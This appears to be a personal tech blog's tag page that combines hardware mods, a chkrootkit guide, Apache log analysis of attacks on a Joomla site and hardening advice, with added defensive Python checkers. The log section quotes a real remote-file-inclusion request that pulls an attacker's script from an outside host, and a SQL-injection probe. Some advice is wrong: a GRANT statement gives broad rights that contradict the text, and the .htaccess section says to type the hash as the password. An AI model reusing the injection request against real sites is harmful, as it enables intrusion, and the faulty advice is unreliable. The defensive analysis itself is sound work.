hacker

Hacker may refer to several things: read more at Wikipedia

  • Add a LED to your Xbox to see hard disk activity

    This mod is quite risky, especially if you
    cannot solder with precision.

    Legal Issues

    1. It is strictly forbidden in France to modify your Xbox, or to sell or install mod chips.
    2. Even opening the Xbox is forbidden.
    3. Remember that pirating is a crime; support the developers and film companies.


    1. How To

    Required:
    • LED
    • Resistor 220 Ohms

    The resistor (its value depends on the LED's power) has to be soldered to the longer LED lead.

    +5 Volts is taken from the connector; you can open the connector and close it again without any difficulty.

    The trickiest part is soldering the signal (negative) to pin 39.

    You should also verify your soldering carefully; this tool may help.

    Drill a 3 mm hole, or bigger depending on the LED size.

    Final Result


  • A security flaw that could allow hackers to eavesdrop on cellphone conversations made over Bluetooth-based wireless headsets was revealed in April 2004, but at that time an expensive piece of hardware was needed. Now it is even worse: a simple brute-force attack while the two devices are doing their key exchange...

    "Whitehouse showed in 2004 that a hacker could arrive at this link key without knowing the PIN using a piece of equipment called a Bluetooth sniffer. This can record the exchanged messages being used to derive the link key and feed the recordings to software that knows the Bluetooth algorithms and can cycle through all 10,000 possibilities of the PIN. Once a hacker knows the link keys, Whitehouse reasoned they could hijack the device."

    The new attack forces the two Bluetooth devices to pair; the link key can then be worked out in just 0.06 seconds on a Pentium IV computer, and in 0.3 seconds on a Pentium III.

  • chkrootkit is a tool to locally check for signs of a rootkit. It is a common Unix-based program intended to help system administrators check their system for known rootkits. It works by using several mechanisms, including comparing file signatures to known rootkits and checking for suspicious activity (for example, processes listed in the proc filesystem but not in the output of the 'ps' command).
    Log in to the server with ssh as the root user.

    Download chkrootkit.
    # wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

    Unpack the chkrootkit archive you just downloaded.
    # tar xvzf chkrootkit.tar.gz

    Go to that directory.
    # cd chkrootkit

    Compile.
    # make sense

    Run it from the build directory.
    # ./chkrootkit

     
    Receive an e-mail every day with the chkrootkit result
    For the root user
    # crontab -e
    For any other user
    # crontab -e -u username

    and add

    0 3 * * * (/usr/sbin/chkrootkit 2>&1 | mail -s "chkrootkit output" -c cc-one@example.com,cc-two@example.com admin@example.com)

    * the correct path can be found with `which chkrootkit`; the three addresses above are placeholders, the original ones were hidden by the site's spam protection
    This will run chkrootkit at 3:00 am every day and e-mail the output to the last address, with copies to the two addresses given with -c.

    False alarms:
    "Checking `bindshell'... INFECTED (PORTS: 465)" This is normal and NOT really a rootkit.

    Note
    If you ever get a positive alarm, you can try to remove the rootkit, but all professionals would advise you to reinstall the server from scratch and restore a previous backup (that means saving nothing from the server once the rootkit is revealed...)

    Links
    chkrootkit
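As an added example (not chkrootkit's own code), here is the /proc-versus-ps comparison the text mentions, written in Python; it takes two /proc snapshots so that a process which exits while ps is running is not reported as hidden. It assumes a Linux-style /proc and a ps that accepts `-e -o pid=`.

```python
"""Hidden-process check in the spirit of chkrootkit's /proc vs ps comparison.

Added example, not chkrootkit's own code. It lists the PIDs visible in /proc,
asks `ps` for the PIDs it knows about, and reports PIDs that exist in /proc
but that ps does not show. Two /proc snapshots are taken so a process that
simply exited (or started) between the two views is not reported as hidden.
"""
import os
import subprocess
from typing import Iterable, Set


def proc_pids(proc_root: str = "/proc") -> Set[int]:
    """PIDs present in the proc filesystem (numeric directory names only)."""
    try:
        entries = os.listdir(proc_root)
    except OSError:                       # no /proc on this platform
        return set()
    return {int(name) for name in entries if name.isdigit()}


def parse_ps_pids(ps_output: str) -> Set[int]:
    """Parse the output of `ps -e -o pid=` (one PID per line) into a set."""
    pids: Set[int] = set()
    for line in ps_output.splitlines():
        token = line.strip()
        if token.isdigit():
            pids.add(int(token))
    return pids


def ps_pids() -> Set[int]:
    """PIDs reported by the ps command; empty set if ps is unavailable."""
    try:
        out = subprocess.run(["ps", "-e", "-o", "pid="],
                             capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return set()
    return parse_ps_pids(out)


def hidden_pids(before: Iterable[int], ps_seen: Iterable[int],
                after: Iterable[int]) -> Set[int]:
    """PIDs present in both /proc snapshots that ps did not list.

    Requiring presence in both snapshots filters out processes that exited or
    started while ps was running (ps itself included), the usual source of
    false positives in this kind of check.
    """
    stable = set(before) & set(after)
    return stable - set(ps_seen)


def check_hidden_processes() -> Set[int]:
    """Live check: snapshot /proc, run ps, snapshot /proc again."""
    before = proc_pids()
    seen = ps_pids()
    after = proc_pids()
    return hidden_pids(before, seen, after)


if __name__ == "__main__":
    hidden = check_hidden_processes()
    if hidden:
        print("Checking `hidden processes'... WARNING:", sorted(hidden))
    else:
        print("Checking `hidden processes'... nothing found")
```

A PID reported here is worth a look with `ls -l /proc/<pid>/exe`, but rootkits that also hook /proc reads will not be caught by this check alone.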

  • I've already tried to reduce the attack surface of my homepage by removing all unneeded components, modules and mambots, but below is what I've found in the log files...

    Hackers trying remote code injection

    Lines like the following were found more than once in the Apache error.log:

    [Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

    Remember: you should update the following components to their latest version ASAP:
    • com_securityimages < 3.0.5: use at least a version > 3.0.6
    • com_hashcash < 1.2.1: use at least a version > 1.2.2
    • com_bayesiannaivefilter was developed but never released as a component; it is still available in the Joomla forge developer tree.
    This attack is trying to execute a script located at http://recon.reschat.dk/images/gallery/tool25.txt. If you go there, you'll find that the script is readable and contains a header:
    Defacing Tool 2.0 by xxxxxx
    "Defacing Tool 2.0 by xxxxxxx" is a suite of PHP-based scripts that allows the attacker to send commands to the server, primarily with the intent to deface websites.

    Solutions:
    1. For com_bayesiannaivefilter, sorry guys, but I do not have this plugin, nor has it ever been released in the wild. For com_securityimages or com_hashcash, just upgrade!
    2. If you manage a web host which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable (in /etc/php.ini): allow_url_fopen = Off

    Hackers trying to access well known PHP files

    Each of the lines below appeared more than 500 times... in 1 day

    [Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
    [Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
    [Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
    [Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

    Hackers trying to access files that do not exist
    • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
    • wiki/administrator/
    • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
    • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
    • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php
    These look like programs brute-forcing a set of paths from a rule set, searching for well-known vulnerabilities.

    Some strange attempts...

    [Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
    [Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
    [Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
    [Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
    [Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
    [Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com
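As an added example (not the site's own tooling), a small Python scanner that applies the three patterns shown in the excerpts above to Apache error.log lines: remote-include attempts, per-client probing of several admin component paths, and repeated basic-auth failures. The thresholds and the placeholder remote host are assumptions.

```python
"""Flag the probe patterns shown in the error.log excerpts above.

Added example, not the site's own tooling. Three findings are reported:
remote-include attempts (a query parameter whose value is a URL), clients
probing several distinct /administrator/components/ paths, and repeated
basic-auth failures per client. The thresholds are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Apache 2.0/2.2 error-log line: [timestamp] [level] [client IP] message
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] "
                     r"\[client (?P<ip>[0-9A-Fa-f.:]+)\] (?P<msg>.*)$")
# First query parameter whose value starts with a URL (optionally wrapped in
# '['), the shape of the mosConfig_absolute_path=[http://... request above.
REMOTE_INCLUDE_RE = re.compile(
    r"\?(?P<param>[\w\[\]]+)=\[?(?P<url>(?:https?|ftp)://\S+)", re.IGNORECASE)
# Admin component touched by the request, with or without a leading slash.
COMPONENT_RE = re.compile(r"administrator/components/(com_[\w-]+)/")
# Basic-auth failures: "user  not found: ..." / "user x: authentication failure ..."
AUTH_FAIL_RE = re.compile(r"^user .*?(?:not found|authentication failure)")


def parse_line(line: str):
    """Split one error.log line into its fields; None if the line does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse(lines: Iterable[str], probe_threshold: int = 2,
            auth_threshold: int = 2) -> Dict[str, object]:
    """Return the three kinds of findings, each keyed by client IP.

    probe_threshold: distinct admin components one client must touch before it
    is reported as path probing; auth_threshold: basic-auth failures per client.
    """
    remote_include: List[Tuple[str, str, str]] = []
    components: Dict[str, Set[str]] = defaultdict(set)
    auth_failures: Dict[str, int] = defaultdict(int)

    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue                      # not an Apache error-log line
        ip, msg = rec["ip"], rec["msg"]
        m = REMOTE_INCLUDE_RE.search(msg)
        if m:
            remote_include.append((ip, m.group("param"), m.group("url")))
        for comp in COMPONENT_RE.findall(msg):
            components[ip].add(comp)
        if AUTH_FAIL_RE.match(msg):
            auth_failures[ip] += 1

    return {
        "remote_include": remote_include,
        "path_probing": {ip: sorted(c) for ip, c in components.items()
                         if len(c) >= probe_threshold},
        "auth_failures": {ip: n for ip, n in auth_failures.items()
                          if n >= auth_threshold},
    }


# Constructed sample, modelled on the excerpts above; the remote host in the
# first line is replaced by a placeholder.
SAMPLE_LINES = [
    '[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://attacker-example.invalid/tool25.txt?cmd=id HTTP/1.0',
    '[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php',
    '[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch',
    '[Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php',
    '[Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php',
    '[Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php',
    '[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan',
]

if __name__ == "__main__":
    for kind, found in analyse(SAMPLE_LINES).items():
        print(kind, found)
```

Feed it the real file with `analyse(open("error.log"))`; the IPs it reports are candidates for the `deny from` lines of the .htaccess tutorial further down this page.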

  • i.will.use.google.before.asking.dumb.questions

    I went through this interesting article “How To Ask Questions The Smart Way”; while a bit old (2006), it is full of very good advice for asking questions the smart way (and also sometimes finding an answer on your own).

    In the world of hackers, the kind of answers you get to your technical questions depends as much on the way you ask the questions as on the difficulty of developing the answer. This guide will teach you how to ask questions in a way more likely to get you a satisfactory answer.
    Now that use of open source has become widespread, you can often get as good answers from other, more experienced users as from hackers. This is a Good Thing; users tend to be just a little bit more tolerant of the kind of failures newbies often have. Still, treating experienced users like hackers in the ways we recommend here will generally be the most effective way to get useful answers out of them, too.
    The first thing to understand is that hackers actually like hard problems and good, thought-provoking questions about them. If we didn't, we wouldn't be here. If you give us an interesting question to chew on we'll be grateful to you; good questions are a stimulus and a gift. Good questions help us develop our understanding, and often reveal problems we might not have noticed or thought about otherwise. Among hackers, “Good question!” is a strong and sincere compliment.

  • An interesting article which also explains how to make the most of the query capabilities of the Google search engine. Note that Google has nothing to do with this security breach; their search engine is simply too efficient, and users are not clever enough to store all sensitive data in a cryptographic container like PGPdrive or TrueCrypt.

    Google is in many ways the most useful tool available to the bad guys, and the most dangerous Web site on the Internet for many, many thousands of individuals and organizations. Read more at SecurityFocus

    Google has been and will always be a valuable tool in my daily work, as it allows me to resolve a lot of developer problems in no time...

  • Nullwire has posted a how-to:

    1. Download and install the Android SDK found here.
    2. Download this zip containing the latest Android images:

    3. Unpack files to a temporary location.
    4. Backup the folder <android-sdk-folder>/tools/lib/images (<android-sdk-folder> is the Android SDK installation folder)
    5. Replace the files ramdisk.img, system.img and userdata.img in <android-sdk-folder>/tools/lib/images with the files unpacked from the zip in step 3.
    6. Start the emulator and wait.

    And if you don't want to try this hack, just watch the posted screencast detailing the main new features of Cupcake.
  • checklist

    An exploited or hacked server is one that is no longer fully under your control and someone else is now partially using your server for their own purposes.

    You'll find in this mind map what bad guys can do, and the remedies.

    Why a mind map?

    A mind map is a diagram used to visually outline information. Mind maps help you take notes, brainstorm complex problems, and think creatively.

    • Information is summarized efficiently so that it is usable and accessible,
    • The inter-relationships between the different concepts are clear,
    • It is the most flexible way of organizing associative, divergent and convergent thinking (convergent thinking involves aiming for a single, correct solution to a problem, whereas divergent thinking involves the creative generation of multiple answers to a set problem).

    You can find the latest version at

    http://linux-compromised-server-checks.waltercedric.com/

  • Typically me: an article before on "how to enhance security of web applications", and an article after on "how to break everything a lot faster"... I suggest you always keep an eye on what is going on behind the scenes (hacking) in order to do everything you can to save your ass

     If you do Web application security assessments, this page is for you. We've gathered all of the tools and techniques discussed in Hacking Exposed: Web Applications (that we use every day as consultants) and cataloged them here. This is an abbreviated recitation of Appendix B in the book, with live hyperlinks for easy access. Keep your eyes on this space as we post custom scripts and tools from the authors!  from http://www.webhackingexposed.com

  • In this post, I will show you how to bring an old webcam of 2000 back to life for the latest iterations of Windows Vista/Seven by injecting the firmware of another webcam into it.

    Philips Webcam ToUcam Pro - PCVC740K

    Year 2000
    Philips Webcam SPC900NC VGA CCD with Pixel Plus

    Year 2008

    If you read the Philips Support FAQ

    You will end up with this laconic text: “There are no Vista drivers available for this product due to the product’s age.”

    Although there is an alternate way that only works with Windows Vista, the solution I propose is to just make the driver think that another webcam is plugged in! This works because most webcams out there have seen no big hardware changes for many, many years (except packaging/price and a blinking LED).

    DISCLAIMER !!! I'm not responsible for damage you could cause to your webcam because of errors in performing the described firmware upgrade...

     

     

    Success story

    The following webcams were converted successfully:

    • 1 webcam PCVC840K converted into SPC900NC
    • 2 webcams PCVC740K converted into SPC900NC

    The following failed, but I was able to recover it from the saved firmware:

    • Philips PCVC680 USB VGA Camera; Video

    Contact me if you successfully convert your webcam.

    How to

    You need an operating system that is still able to recognize your webcam. Most discontinued Philips webcams which refuse to work under Vista/Seven were working under Windows XP, so try to get access to an old PC running that OS. Lucky owners of Windows 7 Professional/Ultimate are able to use “Windows XP Mode”.

    Download the software WCRMAC here http://www.burri-web.org/bm98/soft/wcrmac/wcrmac-2.0.85.zip and install it.

    WcRmac allows some internal memory modifications of webcams based on the Philips SAA8115 / 8116 camera chips. Those are usually cameras with a 640x480 CCD sensor (various brands).

    Connect the webcam under Windows XP and install the required drivers if needed. At that point you must be able to see the webcam and get an image in Windows Explorer. Leave the webcam running in the background.

    Download the latest firmware of the latest Philips webcam flagship SPC900NC here http://www.home.zonnet.nl/m.m.j.meijer/D_I_Y/spc900nc.bin and copy this file under  the directory

    • C:\Program Files\TWIRG\WcRmac\binary\8116 

    Start WCRMAC and connect the webcam by selecting it under the menu “webcam”

    Now go to the “binaries” tab and click “Get current and save as” to make a copy of the existing firmware to disk. Then select the latest firmware, spc900nc.bin, in the list and click the “load” button.

    Now the webcam should be recognized under Windows Vista/Seven (even 64-bit)! It will have all the software goodies of the latest webcam: face detection, anti-flickering, up to 90 frames per second!

     

     

    References

  • .htaccess files are very versatile and can easily protect some areas of your homepage. In the case of Mambo, I am giving you here a way to secure it in less than 5 minutes.

    All you have to do is to drop a file named .htaccess in your /administrator directory

    Here is a template .htaccess you can use:
    # Do not allow any user to access this file - to copy in all .htaccess
    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>

    Force the admin area to require an .htaccess password:
    AuthType Basic
    AuthUserFile /pathto/.htpasswd
    AuthGroupFile /dev/null
    AuthName "Walter Cedric Administrator Area"
    <Limit GET POST>
    require valid-user
    </Limit>

    • pathto should normally be outside your public web server directory!
      In Plesk, that means outside the httpdocs directory!
    • .htpasswd is a text file which contains a mapping login:password.

    Example of .htpasswd
    admin:XXXXXXX

    XXXXXXX must be replaced by its crypt version; use this URL to create a new
    crypted value:

    http://de.selfhtml.org/cgi-bin/cryptform.pl?password=aSI45I56B4KgR34542

    In this example, I want aSI45I56B4KgR34542 as password (my real password is even more complex!); the page then displays

    cziW29BR6Y3fM

    Be careful: it changes at each reload of the page, since the system adds a "salt" to the password in order to defeat brute-force attacks with a dictionary.

    So I create a file .htpasswd which contains:

    Example of .htpasswd
    admin:cziW29BR6Y3fM

    So in order to be able to get into my Mambo administrator panel, I will have to type

    user name: admin
    password: cziW29BR6Y3fM

    HTACCESS contains a lot more keywords and ways to protect data or directories.
    I recommend you Google a little to find some exhaustive articles like this one in German:
    http://de.selfhtml.org/servercgi/server/htaccess.htm#optionen

    If you're using my component hashcash or any statistics/log tool on your server, you may know the IPs of the bad guys who try to break into your site. There is a way to block these attacking zombies at the server level: just extend the Limit section of the .htaccess file

    <Limit GET POST>
    order allow,deny
    allow from all
    deny from XXX.XXX.XXX.XXX
    deny from .microsoft.com
    </Limit>

    where XXX.XXX.XXX.XXX is the IP or part of the IP (XXX, XXX.XXX or XXX.XXX.XXX), but it can also be a DNS name. You can add as many lines as you want.

  •

    Sony PS3 Modding - Homebrew, Upgrades, Mods, and Hacks is a blog already listing an impressive number of mods for the PlayStation 3; some examples:
  • Bob made a lot of (obvious) mistakes, but you will still be able to learn a lot by going through this mind map. The names have been changed to protect the innocent.

    Hack of Bob

     

  • A lot of Mambo/Joomla sites have been hacked last week; since I've already helped someone harden an installation (Mambo 4.5.2.3), I've decided to write a tutorial for the benefit of the open source community...

    Some steps are common sense while others are not.

    But:

    • Do not think that doing all the steps below will protect you! Nothing is secure in the computer world, or not for very long...
    • Do not think that after doing all the steps below, Joomla will be as user friendly for you as before! We are restricting rights and changing some behaviours of the web server; it will be more difficult to publish content, but on the other side, articles and content will be safer.
    • Security always comes with a pain!

    Consider this page a work in progress; feedback is, as usual, welcome. Click "read more" for the article.

    Choose a (better) FTP password for accessing your homepage, one which is not trivial, using the rules in Annex A

    Requirements: having a valid login and password to your Plesk account

    How: http://yoursite.com:8443/

    Go to the main page. If your hosting company allows you to create many subdomains, click on the right one, here www.waltercedric.com

    On the Plesk main page, click on Domains, here waltercedric.com; on the next page, click on Setup.
    Then enter the new FTP password and save.
    Choose a DIFFERENT Joomla/Mambo administration password using the rules in Annex A

    Requirements: having a valid login and password to your Joomla administrator account

    How:

    Go to your administrator panel
    For example http://yourhost/administrator/
    Click on your login name, here admin
    Enter a new password
    Choose a DIFFERENT Plesk password for the administration of your site using the rules in Annex A

    Requirements: having a valid login and password to your Plesk administrator panel

    Go to: http://yoursite.com:8443/, which is the default URL for Plesk; attention, it may vary depending on your hosting company

    On the main page, click on Edit and enter the new password
    Choose a DIFFERENT MySQL password for the Joomla/Mambo tables using the rules in Annex A

    How
    Use the Plesk administration panel

    On the Plesk main page, click on Domains, here waltercedric.com; on the next page, click on Databases.
    Then click on your Joomla database (here memos), then on the right user, here mosuser. Note that I have
    a special user for backup purposes with only SELECT rights! Then change the password.

    Open the file /configuration.php and change the key mosConfig_password
    Adapt the user rights of the MySQL Joomla user

    A MySQL user may have the following privileges:

    This user, for example joomlaUser, should ONLY have INSERT (new comments, guestbook), DELETE and UPDATE rights on the Joomla/Mambo database

    SHOW GRANTS FOR 'mosdev'@'%';
    GRANT ALTER,CREATE,CREATE TEMPORARY TABLES,CREATE VIEW,DROP,EXECUTE,LOCK TABLES,PROCESS,SHOW DATABASES,SHOW VIEW ON *.* TO 'mosdev'@'%' WITH GRANT OPTION;
    FLUSH PRIVILEGES;

    Do not allow DROP or CREATE TABLE; normal operation of Joomla does not require it! Of course, as soon as you want to install a new component, you will have to temporarily allow joomlaUser to create new tables (if the component requires it)

    Adapt file rights on your server

    A heritage of UNIX: file rights are organized in 3 groups, user, group and all. Each group may individually be allowed to read (r), write (w) or execute (x) a file. The combination rwx is read in octal, rwx = 7 for each group, so 777 is the worst setting: anybody may be able to delete or change your files on the server...

    This is how my file structure looks:

    Recommended                     Set to         CHMOD equivalent
    file rights                     r-- r-- r--    444
    directory rights                r-x r-x r-x    555
    Exception for /cache directory  rwx rwx rwx    777

    How: use an FTP tool like CuteFTP; on the selected resources, use the right-click menu and check the bits:

    Example in CuteFTP; note that the command is not recursive!

    Side effects

    • You won't be able to use the upload function of HTMLArea: impossible to upload images or files using the administrator article editor.
    • Each time you want to publish a new article with pictures inside, you'll have to copy them with FTP before editing in order to be able to insert them into the text.
    • In order to write a file into the directory C in the path A/B/C, you will have to temporarily set directories A, B and C to rwxr-xr-x rights (CHMOD 755)!
    Protect some parts of Joomla using an additional password like .htaccess

    Requirements: your provider must support .HTACCESS per directory

    How:

    Read my tutorial HERE

    Side effects

    • Some components or code trying to read files from the admin area (if protected by an .htaccess file) may bring up a login popup window for your users, but it is possible to find these problems and solve them quickly. My plugin securityimages in its first version also had this error (coding)
    Run a part of your site in HTTPS mode

    For added security, you can force users to access your pages using an SSL (Secure Socket Layer) connection. This means transmitted data is encrypted, so passwords and web pages cannot be read in cleartext over the Internet.

    Ideally only the administration part (all URLs beginning with http://yoursite/administrator/), or your whole site.

    Why: if your site runs in HTTP mode, all passwords and fields submitted to the server are sent in cleartext (can be read). An attacker may be able to intercept or fake a user by rerouting the HTTP request. In HTTPS mode, data travels encrypted on the network and a session key prevents replay attacks. Moreover, it is not realistic to run a commercial business on the Internet without HTTPS

    Requirements: your provider/hosting company should allow it

    How

    Run the FULL site in https:
    • In Plesk, just copy your Joomla/Mambo file structure from /httpdocs to the directory /httpsdocs with an FTP tool
    • Optionally put a file index.html in /httpdocs which redirects users to the protected https area, to show users that your site still exists (it will not bring an error 404: page not found)

    Run PART of the site in https:
    This is certainly not as easy as running your full site with https,


    Side effects

    • If you install a new site, no problem
    • If you have an existing homepage and are heavily indexed by Google and Co. and/or many users have bookmarked you, users will be disturbed to say the least, and Google may think you are using some spammer techniques (moving and creating/hiding new content)
    Review OpenSEF/SEF 404 logs

    If a SEO/SEF component is installed, you may be able to look at unusual or incorrect URLs. This typically can reveal some SQL or parameter injection in existing code.

    SEO will in fact reject some URLs and redirect the user to your home root index.php instead of displaying an error message or revealing information about the file structure, which is a positive side-effect

    ex:

    .../banner.php?id=120&client="select 1 from dual" someone is trying to test SQL injection in the component Banner

    Review access logs

    Search the log file for unusual behaviour: is someone accessing /index2.php (the admin part of your site) too often (in a small interval)? This may be a brute-force attack!

    Requirements: have Plesk access

    How:

    On the Plesk main page, click on Domains, here waltercedric.com; on the next page, click on Log Manager
    • The server access log records all requests processed by the server: access log for http:// and access ssl log for https://
    • The server error log, whose name and location is set by the ErrorLog directive, is the most important log file. This is the place where Apache httpd will send diagnostic information and record any errors that it encounters in processing requests. It is the first place to look when a problem occurs with starting the server or with the operation of the server, since it will often contain details of what went wrong and how to fix it.
    • The xferlog file contains logging information from the FTP server daemon, ftpd

    Make backups!

    Joke: "Real men don't do backups, but they often cry"

    MySQL:
    4 ways to automate Mambo database backup..

    FTP:
    use any FTP tool to sync, or the Plesk backup function

    Keep your Joomla/Mambo installation up to date.

    Always use the latest version of Joomla: www.joomla.org or the latest version of Mambo: www.mamboserver.com

    As soon as a new version of Joomla/Mambo is available, install it the same day!

    • Hackers will look at the patch and search for unpatched servers! It has never been so easy to search for servers running a certain CMS version, thanks to search engines. As an example, a hacker may search in Google (but any search engine will work) for all sites running Joomla/Mambo with allinurl: administrator/index2.php, so install patches very fast!
    • Make a backup (just in case) and install the new patch; you can also install the patch on your locally running instance of Joomla first
    For the paranoid, or how to push security even higher

    All actions below require some knowledge or time...

    Change ALL the passwords above regularly!

    Just in case someone gets your password or part of it. Ideally you must change your password before a brute force can find it, or as soon as logs reveal a possible attack, just in case the hacker has not started doing something bad with your account..

    With decreasing frequency:

    • Joomla admin password
    • MySQL user password
    • Plesk admin password
    • FTP user password
    Attack surface reduction (ASR)

    Definition:
    M$ has a good article here (the idea is not coming from them, but they are trying to evangelize a lot of developers with good articles)

    So bugs/security issues cannot exist in code that does not exist on the server.... :-)

    Quite easy to understand but really difficult to achieve; here is a way to do it....

    1. Define your requirements: list all components/modules/mambots that you need to run.
    2. Unpublish all components/modules/mambots
    3. Test your site,
    4. If everything runs correctly, remove one component/module/mambot at a time, and test your site
    5. Take care when installing the next CMS patch that you do not copy unneeded files to your server. It may be surprising, but even if a component is not published, if its code is physically present on the server disk it may cause a security vulnerability.

    You now have a customized version of Joomla/Mambo with a lot less code running and possibly a lot fewer unknown vulnerabilities! It will be a pain to maintain.

    Logs always tell the truth! (sometimes)

    You may want to install or write a tool which automatically parses Apache, Tomcat, PHP and MySQL logs in order to monitor them

    Just for FUN....

    Just to give you an overview of some crazy things that can be done....

    • I read some time ago about a person who customized a Linux distribution. In order to be sure that if someone ever got access to the disk they would not be able to execute any command, he renamed all files and commands on disk... This is also possible for Joomla: write a Java/C#/other parser which renames all files/directories and changes all include, include_once, require and require_once statements to use UUIDs. It is possible but surely (a pain to) maintain.
    • If you have a full web server for yourself, you can create a special user which starts PHP and Apache and is not able to write or erase files.
    • The last crazy thing I can imagine (but with time I can be more creative ;-) ) would be to create a release of my homepage, burn it on a DVD (read only) and publish it on the web server.
    Of course this last example does not allow you to use the CMS normally; you have a bloody read-only site, but nobody will be able to tamper with the data...

     

     

    Normally your provider is already doing a lot behind the scenes, and may have done some things for you. It can be useful to contact them to ask what they are already monitoring or doing to prevent your site from being hacked.

    Congratulations, you now have a lot more secure Joomla/Mambo homepage!

    Comments are, as usual, welcome; use the contact section of this site!

    Annexes

    A. Choosing a good password
    • NEVER use any word that can be found in a dictionary! Common brute-force programs can try millions of passwords in seconds
    • Do not use your name, birthday, or part of your domain name
    • A good password is at least 10 characters long! (the entropy gets too high for brute forcing after 7 characters)
    • Use all the characters of the keyboard (@_!), and use mixed case and numbers

    Ex: dR2_z57zzU!sP is not a bad password
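
As an added example (not part of the original article), a Python checker that applies the Annex A rules above to a candidate password and estimates the brute-force search space in bits. The embedded word list is a constructed stand-in; the rejected personal strings are whatever you pass in.

```python
"""Check a candidate password against the Annex A rules.

Added example, not part of the original article. WORDS is a tiny constructed
stand-in for a real dictionary (use e.g. /usr/share/dict/words in practice);
`personal` carries the strings the rules forbid (name, birthday, domain parts).
"""
import math
import re
from typing import Iterable, List

MIN_LENGTH = 10          # rule: at least 10 characters
MIN_WORD_LEN = 4         # ignore tiny dictionary entries such as "a" or "the"
WORDS = ("admin", "joomla", "mambo", "password", "secret", "welcome")  # constructed

# (rule name, matcher, size of that character class for the entropy estimate)
CLASSES = (
    ("lowercase letter", re.compile(r"[a-z]"), 26),
    ("uppercase letter", re.compile(r"[A-Z]"), 26),
    ("digit", re.compile(r"[0-9]"), 10),
    ("symbol", re.compile(r"[^A-Za-z0-9]"), 33),   # printable ASCII punctuation
)


def domain_parts(domain: str) -> List[str]:
    """'www.waltercedric.com' -> ['waltercedric']: drop 'www' and the TLD."""
    labels = [p for p in domain.lower().split(".") if p and p != "www"]
    return labels[:-1] if len(labels) > 1 else labels


def estimated_bits(pw: str) -> float:
    """Brute-force search space, in bits, from length and the classes actually used."""
    space = sum(size for _, rx, size in CLASSES if rx.search(pw))
    return len(pw) * math.log2(space) if space else 0.0


def check_password(pw: str, personal: Iterable[str] = (),
                   words: Iterable[str] = WORDS) -> List[str]:
    """Return the violated rules; an empty list means the password passes."""
    problems: List[str] = []
    low = pw.lower()
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    for name, rx, _ in CLASSES:
        if not rx.search(pw):
            problems.append(f"no {name}")
    for w in sorted(words):                       # sorted: stable report order
        if len(w) >= MIN_WORD_LEN and w.lower() in low:
            problems.append(f"contains dictionary word '{w}'")
    for item in personal:
        item = str(item).lower()
        if len(item) >= 3 and item in low:
            problems.append(f"contains personal data '{item}'")
    return problems


if __name__ == "__main__":
    me = ["Walter", "2006"] + domain_parts("www.waltercedric.com")
    for candidate in ("dR2_z57zzU!sP", "Password1!", "Walter2006!x"):
        print(candidate, check_password(candidate, me) or "OK",
              f"{estimated_bits(candidate):.0f} bits")
```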

